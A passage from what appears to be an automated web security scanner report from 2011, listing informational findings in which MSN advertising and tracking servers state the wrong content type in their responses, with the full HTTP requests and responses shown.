Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2707
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8604359-T8395935-C77000000000046666
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:53 GMT
Content-Length: 2707


//<![CDATA[
function getRADIds() { return{"adid":"77000000000046666","pid":"8604359","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...

29.2. http://ac3.msn.com/de.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ac3.msn.com
Path:   /de.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /de.ashx?p_abtest=190&v=pubm12&w=728&h=90&url=http%3A//realestate.msn.com/article.aspx%3Fcp-documentid%3D28280145&ref=http%3A//realestate.msn.com/article.aspx%3Fcp-documentid%3D28280145&lmt=1303861556&tz=300&cc=100&dt=1303843556841&uh=1200&uw=1920&uah=1156&uaw=1920&cd=16&npl=9&nmime=44&ja=true&app=Netscape&his=2&plf=Win32&idx=1303843556843&cb=ServiceAdCallBack HTTP/1.1
Host: ac3.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, no-transform
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-ADC-ResponseInfo: MSDatacenter=SN2B, InternalResponseTime=3
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:45:49 GMT
Content-Length: 179

MicrosoftFES.ServiceAdCallBack({"AdUnit":{"provider":"Solid","script":"%3Cdiv%20style%3D%22height%3A90px%3Bwidth%3A728px%3Bbackground-color%3A%23000000%3B%22%20/%3E","frid":""}});

29.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:15 GMT; path=/
Set-Cookie: i_1=33:1411:790:100:0:40771:1303842975:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 886

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b
...[SNIP]...

29.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

29.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:15 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303842975:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 889

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d
...[SNIP]...

29.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:40:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:40:38 GMT; path=/
Set-Cookie: i_1=33:353:516:141:0:45000:1303843238:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:40:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 824

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7
...[SNIP]...

29.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

29.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:40:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

29.9. http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d743529/2/743550/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d743529/2/743550/randm.js HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://theinvestedlife.msn.com/?source=msnmoney
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:21 GMT
Server: Apache/2.2.3
Last-Modified: Thu, 06 Jan 2011 05:00:31 GMT
ETag: "c105966c-1-499266188b9c0"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Tue, 26 Apr 2011 19:09:21 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Type: application/x-javascript

;

29.10. http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d743529/3/743551/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d743529/3/743551/randm.js HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://theinvestedlife.msn.com/?source=msnmoney
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:21 GMT
Server: Apache/2.2.3
Last-Modified: Thu, 06 Jan 2011 05:00:32 GMT
ETag: "1011dce4-1-499266197fc00"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Tue, 26 Apr 2011 19:09:21 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Type: application/x-javascript

;

29.11. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d840009/7/41115363/decide.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adsc/d840009/7/41115363/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:49:17 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Mon, 26 Apr 2010 21:49:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1; expires=Sat, 16 Jun 2012 13:49:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0; expires=Sat, 16-Jun-2012 13:49:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Content-Length: 1042
Content-Type: text/html

/* b203.dl - Tue Apr 26 12:42:39 EDT 2011 */
(function(){
var d=document,s_id="SafeCount_Link",b;
function z(){
var ifr=(self!=top),sd="",b;

try{
b = top.document.body;
ifr = false;
} catch (e) { }


...[SNIP]...

29.12. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=840009&site=60630073&code=41115363&randnum=4925450 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:49:14 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b101.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 789
Content-Type: text/html

(function(){
var rp=parseFloat("100"),r=Math.random()*10000,s_id="DL_840009_7_41115363",w=window,d=document;

function z(){
var s,i=(w==top),u;
if(!d.body){setTimeout(z,100);return;}
if(!i){
try{
s=to
...[SNIP]...

29.13. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p92429851&1303842996956 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:28 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

29.14. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVSRQ&AP=1025 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2123
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8479898-T28253488-C93000000000038010
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:52 GMT
Content-Length: 2123


//<![CDATA[
function getRADIds() { return{"adid":"93000000000038010","pid":"8479898","targetid":"28253488"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);if(paren
...[SNIP]...

29.15. http://blstc.msn.com/br/chan/css/cntwmodule.2010.29.09.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blstc.msn.com
Path:   /br/chan/css/cntwmodule.2010.29.09.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain AMF-encoded data.

Request

GET /br/chan/css/cntwmodule.2010.29.09.css HTTP/1.1
Host: blstc.msn.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/css
Accept-Ranges: bytes
ETag: "0a0e81c5b64cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
S: BLUMPPSTCA03
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Age: 3352314
Date: Tue, 26 Apr 2011 18:45:17 GMT
Last-Modified: Tue, 05 Oct 2010 07:01:20 GMT
Expires: Sat, 17 Mar 2012 23:33:23 GMT
Connection: keep-alive
Content-Length: 2180

........................................................................................................................................................................................................
...[SNIP]...

29.16. http://blstj.msn.com/br/chan/js/chan_slidesurvey.2008.01.02.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blstj.msn.com
Path:   /br/chan/js/chan_slidesurvey.2008.01.02.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain AMF-encoded data.

Request

GET /br/chan/js/chan_slidesurvey.2008.01.02.js HTTP/1.1
Host: blstj.msn.com
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
